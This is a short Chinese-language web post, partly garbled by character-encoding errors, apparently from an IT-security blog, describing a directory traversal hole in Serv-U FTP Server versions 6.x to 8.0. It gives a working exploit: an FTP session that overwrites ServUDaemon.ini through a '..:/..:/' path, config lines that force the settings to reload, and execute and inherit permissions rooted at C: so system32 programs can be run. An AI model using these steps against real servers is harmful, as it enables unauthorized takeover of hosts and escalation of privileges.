1.servu 6.3/6.4以及7.0,8.0等都存在目錄遍歷漏洞。
使用可寫(xiě)帳號(hào)登錄(如果是匿名ftp�����,則只有讀取權(quán)限)
C:\Documents and Settings\Administrator>ftp 127.0.0.1
Connected to 127.0.0.1.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (127.0.0.1:(none)): admin
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd /
250 Directory changed to /
ftp> lcd c:\
Local directory now C:\.
ftp> put ServUDaemon.ini "..:/..:/..:/..:/Program Files/RhinoSoft.com/Serv-U/Ser
vUDaemon.ini"
200 PORT Command successful.
150 Opening ASCII mode data connection for ServUDaemon.ini.
226 Transfer complete.
ftp: 585 bytes sent in 0.00Seconds 585000.00Kbytes/sec.
注意:每次盡量通過(guò)cd / www.xxx.com 切換到當(dāng)前跟目錄��,以便使用..:/..:/相對(duì)的時(shí)候不會(huì)出錯(cuò)�����。
2.對(duì)于重新配置servudaemon.ini后��,立即生效問(wèn)題����,
可以在配置文件里面加入:
[GLOBAL]
Version=6.3.0.0
ReloadSettings=True
3.對(duì)于執(zhí)行權(quán)限:
給予帳號(hào)RWAMELCDP權(quán)限,其中e是執(zhí)行�,p是繼承,一般根目錄為c:����,以便可以對(duì)system32下面的exe直接調(diào)用。
作者 hi.baidu.com/it_security
域名注冊(cè)知識(shí)
虛擬主機(jī)知識(shí)
網(wǎng)站建設(shè)知識(shí)
網(wǎng)絡(luò)推廣知識(shí)
網(wǎng)絡(luò)營(yíng)銷(xiāo)知識(shí)
常見(jiàn)技術(shù)問(wèn)題
QQ空間
新浪微博
開(kāi)心網(wǎng)
人人網(wǎng)
